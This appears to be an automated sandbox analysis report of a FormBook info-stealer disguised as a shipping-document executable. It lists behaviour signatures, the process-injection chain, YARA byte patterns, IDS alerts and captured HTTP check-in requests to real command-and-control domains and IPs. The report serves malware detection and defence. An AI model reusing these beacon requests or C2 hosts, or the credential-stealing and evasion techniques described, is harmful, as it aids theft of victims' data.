
Windows Analysis Report
SHIPPING DOC MBL+HBL.exe

Overview

General Information

Sample name: SHIPPING DOC MBL+HBL.exe
Analysis ID: 1511196
MD5: e57f3cdd911cbaf924bf1e6e7dcc7795
SHA1: eba646965b6549a2cc716c20f128d989cd192f50
SHA256: 61b3a4a9ae0b5189dd42a97b9c680e3787d9d3da3b481701e5795d16480141b1
Tags: exe, Formbook, Shipping

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected FormBook
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
Found direct / indirect Syscall (likely to bypass EDR)
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (date check)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • SHIPPING DOC MBL+HBL.exe (PID: 7308 cmdline: "C:\Users\user\Desktop\SHIPPING DOC MBL+HBL.exe" MD5: E57F3CDD911CBAF924BF1E6E7DCC7795)
    • svchost.exe (PID: 7324 cmdline: "C:\Users\user\Desktop\SHIPPING DOC MBL+HBL.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • PrWIbKXhdqUKk.exe (PID: 3604 cmdline: "C:\Program Files (x86)\sjLtPMjzgWJhBHiifztBWVjhIDgLZXCZgXmSMnQCayzZ\PrWIbKXhdqUKk.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • netbtugc.exe (PID: 7704 cmdline: "C:\Windows\SysWOW64\netbtugc.exe" MD5: EE7BBA75B36D54F9E420EB6EE960D146)
          • PrWIbKXhdqUKk.exe (PID: 3272 cmdline: "C:\Program Files (x86)\sjLtPMjzgWJhBHiifztBWVjhIDgLZXCZgXmSMnQCayzZ\PrWIbKXhdqUKk.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 7940 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup
No configs have been found
Yara matches in memory dumps

Source | Rule | Description | Author | Strings
00000001.00000002.2131318736.00000000030D0000.00000040.10000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000001.00000002.2131318736.00000000030D0000.00000040.10000000.00040000.00000000.sdmp | Windows_Trojan_Formbook_1112e116 | unknown | unknown |
  • 0x2bb30:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x13d2f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000006.00000002.3566928575.0000000003400000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000006.00000002.3566928575.0000000003400000.00000004.00000800.00020000.00000000.sdmp | Windows_Trojan_Formbook_1112e116 | unknown | unknown |
  • 0x2bb30:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x13d2f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000008.00000002.3568694635.0000000004C80000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
(11 further memory-dump entries are not included in this extract)

Yara matches in unpacked PE files

Source | Rule | Description | Author | Strings
1.2.svchost.exe.400000.0.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
1.2.svchost.exe.400000.0.unpack | Windows_Trojan_Formbook_1112e116 | unknown | unknown |
  • 0x2e3e3:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x165e2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
1.2.svchost.exe.400000.0.raw.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
1.2.svchost.exe.400000.0.raw.unpack | Windows_Trojan_Formbook_1112e116 | unknown | unknown |
  • 0x2f1e3:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x173e2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01

System Summary

Source: Process started, Author: Florian Roth (Nextron Systems), Data: Command: "C:\Users\user\Desktop\SHIPPING DOC MBL+HBL.exe", CommandLine: "C:\Users\user\Desktop\SHIPPING DOC MBL+HBL.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\SHIPPING DOC MBL+HBL.exe", ParentImage: C:\Users\user\Desktop\SHIPPING DOC MBL+HBL.exe, ParentProcessId: 7308, ParentProcessName: SHIPPING DOC MBL+HBL.exe, ProcessCommandLine: "C:\Users\user\Desktop\SHIPPING DOC MBL+HBL.exe", ProcessId: 7324, ProcessName: svchost.exe
Source: Process started, Author: vburov, Data: Command: "C:\Users\user\Desktop\SHIPPING DOC MBL+HBL.exe", CommandLine: "C:\Users\user\Desktop\SHIPPING DOC MBL+HBL.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\SHIPPING DOC MBL+HBL.exe", ParentImage: C:\Users\user\Desktop\SHIPPING DOC MBL+HBL.exe, ParentProcessId: 7308, ParentProcessName: SHIPPING DOC MBL+HBL.exe, ProcessCommandLine: "C:\Users\user\Desktop\SHIPPING DOC MBL+HBL.exe", ProcessId: 7324, ProcessName: svchost.exe
Suricata alerts, SID 2855465 (ETPRO MALWARE FormBook CnC Checkin (GET) M2)

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-09-14T11:11:12.968205+0200 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.4 | 49737 | 3.33.130.190 | 80 | TCP
2024-09-14T11:11:37.124367+0200 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.4 | 49741 | 18.139.62.226 | 80 | TCP
2024-09-14T11:11:50.612929+0200 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.4 | 49745 | 66.81.203.10 | 80 | TCP
2024-09-14T11:12:04.990794+0200 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.4 | 49749 | 103.42.108.46 | 80 | TCP
2024-09-14T11:12:18.771437+0200 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.4 | 49753 | 3.33.130.190 | 80 | TCP
2024-09-14T11:12:40.145807+0200 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.4 | 49757 | 199.59.243.226 | 80 | TCP
2024-09-14T11:12:53.457606+0200 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.4 | 49761 | 162.0.239.141 | 80 | TCP
2024-09-14T11:13:14.891931+0200 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.4 | 49765 | 84.32.84.32 | 80 | TCP
Suricata alerts, SID 2855464 (ETPRO MALWARE FormBook CnC Checkin (POST) M3)

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-09-14T11:11:29.516502+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 49738 | 18.139.62.226 | 80 | TCP
2024-09-14T11:11:32.059029+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 49739 | 18.139.62.226 | 80 | TCP
2024-09-14T11:11:34.612983+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 49740 | 18.139.62.226 | 80 | TCP
2024-09-14T11:11:42.992237+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 49742 | 66.81.203.10 | 80 | TCP
2024-09-14T11:11:45.518035+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 49743 | 66.81.203.10 | 80 | TCP
2024-09-14T11:11:48.128716+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 49744 | 66.81.203.10 | 80 | TCP
2024-09-14T11:11:57.285087+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 49746 | 103.42.108.46 | 80 | TCP
2024-09-14T11:11:59.884516+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 49747 | 103.42.108.46 | 80 | TCP
2024-09-14T11:12:02.431525+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 49748 | 103.42.108.46 | 80 | TCP
2024-09-14T11:12:11.113126+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 49750 | 3.33.130.190 | 80 | TCP
2024-09-14T11:12:14.599655+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 49751 | 3.33.130.190 | 80 | TCP
2024-09-14T11:12:16.217823+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 49752 | 3.33.130.190 | 80 | TCP
2024-09-14T11:12:32.486159+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 49754 | 199.59.243.226 | 80 | TCP
2024-09-14T11:12:35.042182+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 49755 | 199.59.243.226 | 80 | TCP
2024-09-14T11:12:37.822272+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 49756 | 199.59.243.226 | 80 | TCP
2024-09-14T11:12:45.819857+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 49758 | 162.0.239.141 | 80 | TCP
2024-09-14T11:12:48.348923+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 49759 | 162.0.239.141 | 80 | TCP
2024-09-14T11:12:50.939526+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 49760 | 162.0.239.141 | 80 | TCP
2024-09-14T11:13:07.153462+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 49762 | 84.32.84.32 | 80 | TCP
2024-09-14T11:13:09.671094+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 49763 | 84.32.84.32 | 80 | TCP
2024-09-14T11:13:12.239819+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 49764 | 84.32.84.32 | 80 | TCP


            AV Detection

            Source: SHIPPING DOC MBL+HBL.exeReversingLabs: Detection: 63%
Source: SHIPPING DOC MBL+HBL.exeVirustotal: Detection: 35%
            Source: Yara matchFile source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000001.00000002.2131318736.00000000030D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.3566928575.0000000003400000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.3568694635.0000000004C80000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.2129407938.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.3567072049.0000000003580000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.3565538257.0000000003050000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.3567001047.00000000036E0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.2132245829.0000000004200000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Submitted SampleIntegrated Neural Analysis Model: Matched 100.0% probability
            Source: SHIPPING DOC MBL+HBL.exeJoe Sandbox ML: detected
            Source: SHIPPING DOC MBL+HBL.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: PrWIbKXhdqUKk.exe, 00000005.00000000.2047243039.0000000000E7E000.00000002.00000001.01000000.00000005.sdmp, PrWIbKXhdqUKk.exe, 00000008.00000002.3566947457.0000000000E7E000.00000002.00000001.01000000.00000005.sdmp
            Source: Binary string: wntdll.pdbUGP source: SHIPPING DOC MBL+HBL.exe, 00000000.00000003.1709765778.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, SHIPPING DOC MBL+HBL.exe, 00000000.00000003.1708441812.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2131532492.000000000339E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2030952866.0000000003000000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2131532492.0000000003200000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2029045752.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000006.00000002.3567257954.00000000037E0000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000006.00000003.2127849653.000000000348F000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000006.00000003.2133475668.0000000003633000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000006.00000002.3567257954.000000000397E000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: SHIPPING DOC MBL+HBL.exe, 00000000.00000003.1709765778.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, SHIPPING DOC MBL+HBL.exe, 00000000.00000003.1708441812.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000001.00000002.2131532492.000000000339E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2030952866.0000000003000000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2131532492.0000000003200000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2029045752.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000006.00000002.3567257954.00000000037E0000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000006.00000003.2127849653.000000000348F000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000006.00000003.2133475668.0000000003633000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000006.00000002.3567257954.000000000397E000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: netbtugc.pdb source: svchost.exe, 00000001.00000003.2094708675.0000000002C1A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2130361226.0000000002C00000.00000004.00000020.00020000.00000000.sdmp, PrWIbKXhdqUKk.exe, 00000005.00000003.2064852940.00000000010BB000.00000004.00000001.00020000.00000000.sdmp
            Source: Binary string: netbtugc.pdbGCTL source: svchost.exe, 00000001.00000003.2094708675.0000000002C1A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2130361226.0000000002C00000.00000004.00000020.00020000.00000000.sdmp, PrWIbKXhdqUKk.exe, 00000005.00000003.2064852940.00000000010BB000.00000004.00000001.00020000.00000000.sdmp
            Source: C:\Users\user\Desktop\SHIPPING DOC MBL+HBL.exeCode function: 0_2_00E6449B GetFileAttributesW,FindFirstFileW,FindClose,0_2_00E6449B
            Source: C:\Users\user\Desktop\SHIPPING DOC MBL+HBL.exeCode function: 0_2_00E6C7E8 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_00E6C7E8
            Source: C:\Users\user\Desktop\SHIPPING DOC MBL+HBL.exeCode function: 0_2_00E6C75D FindFirstFileW,FindClose,0_2_00E6C75D
            Source: C:\Users\user\Desktop\SHIPPING DOC MBL+HBL.exeCode function: 0_2_00E6F021 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00E6F021
            Source: C:\Users\user\Desktop\SHIPPING DOC MBL+HBL.exeCode function: 0_2_00E6F17E SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00E6F17E
            Source: C:\Users\user\Desktop\SHIPPING DOC MBL+HBL.exeCode function: 0_2_00E6F47F FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_00E6F47F
            Source: C:\Users\user\Desktop\SHIPPING DOC MBL+HBL.exeCode function: 0_2_00E63833 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00E63833
            Source: C:\Users\user\Desktop\SHIPPING DOC MBL+HBL.exeCode function: 0_2_00E63B56 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00E63B56
            Source: C:\Users\user\Desktop\SHIPPING DOC MBL+HBL.exeCode function: 0_2_00E6BD48 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_00E6BD48

            Networking

            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49752 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49747 -> 103.42.108.46:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49746 -> 103.42.108.46:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49743 -> 66.81.203.10:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49751 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49739 -> 18.139.62.226:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49742 -> 66.81.203.10:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49745 -> 66.81.203.10:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49760 -> 162.0.239.141:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49755 -> 199.59.243.226:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49758 -> 162.0.239.141:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49753 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49741 -> 18.139.62.226:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49754 -> 199.59.243.226:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49765 -> 84.32.84.32:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49740 -> 18.139.62.226:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49738 -> 18.139.62.226:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49749 -> 103.42.108.46:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49748 -> 103.42.108.46:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49761 -> 162.0.239.141:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49764 -> 84.32.84.32:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49750 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49757 -> 199.59.243.226:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49737 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49756 -> 199.59.243.226:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49744 -> 66.81.203.10:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49762 -> 84.32.84.32:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49759 -> 162.0.239.141:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49763 -> 84.32.84.32:80
            Source: DNS query: www.personal-loans-jp8.xyz
            Source: DNS query: www.quantumnests.xyz
            Source: DNS query: www.siyue.xyz
            Source: Joe Sandbox ViewIP Address: 18.139.62.226 18.139.62.226
            Source: Joe Sandbox ViewIP Address: 162.0.239.141 162.0.239.141
            Source: Joe Sandbox ViewIP Address: 199.59.243.226 199.59.243.226
            Source: Joe Sandbox ViewASN Name: AMAZON-02US AMAZON-02US
            Source: Joe Sandbox ViewASN Name: NAMECHEAP-NETUS NAMECHEAP-NETUS
            Source: Joe Sandbox ViewASN Name: CONFLUENCE-NETWORK-INCVG CONFLUENCE-NETWORK-INCVG
            Source: Joe Sandbox ViewASN Name: BODIS-NJUS BODIS-NJUS
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: C:\Users\user\Desktop\SHIPPING DOC MBL+HBL.exeCode function: 0_2_00E72404 InternetReadFile,InternetQueryDataAvailable,InternetReadFile,0_2_00E72404
            Source: global trafficHTTP traffic detected: GET /gqyt/?gd=NZeSp/M8BkILDmxs2B7hIlXbpVtCmEXRGifz0/tmVi2b1oVO5NeHeL2ulzOnf4Iy2ctjEvS834w05gMs6MQyiHNH7DPloLfSnGllCxy50DD/tOn/niLsxIk=&a0=_6Edzvj0xtFLdH HTTP/1.1Host: www.chamadaslotgiris.netAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.0.1; SAMSUNG SCH-R970 USCC Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
            Source: global trafficHTTP traffic detected: GET /p5rq/?gd=RytyLV2sDE3KAjiSkyiXOnQjrJMqpEw2xv60Q0DZuFoqqvUh/Zvb/zR4+xNnv9lNk3zYZu+tANFIvcmMVMI5H28EY01DAN4ct7k9yl5pOX5UKp3K5dMEiwU=&a0=_6Edzvj0xtFLdH HTTP/1.1Host: www.masteriocp.onlineAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.0.1; SAMSUNG SCH-R970 USCC Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
            Source: global trafficHTTP traffic detected: GET /osde/?gd=RWxN1EBNqsrI97geHJKF+m1NqN4D5Qwm3eCTWsUjqsqAz5HjDo5OrFUtMmzwWkvzE1VCadoWcR1nh8rv/P1sJReZCD/pggQ9SZws5yKjtGx+wP+UoHuai7o=&a0=_6Edzvj0xtFLdH HTTP/1.1Host: www.mediaplug.bizAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.0.1; SAMSUNG SCH-R970 USCC Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
            Source: global trafficHTTP traffic detected: GET /yl6y/?gd=QPKrZbNCTa4h9OiZDCqTEYRHVYq8I9pQgXRm4OHk1vP2UInoYMEgLbhzG96tdyW5WcZsMbYjLnFg+NDONb5+DVpCe+n8LSxyZkRiMUCXQdQdgo9ddvaEU2A=&a0=_6Edzvj0xtFLdH HTTP/1.1Host: www.independent200.orgAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.0.1; SAMSUNG SCH-R970 USCC Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
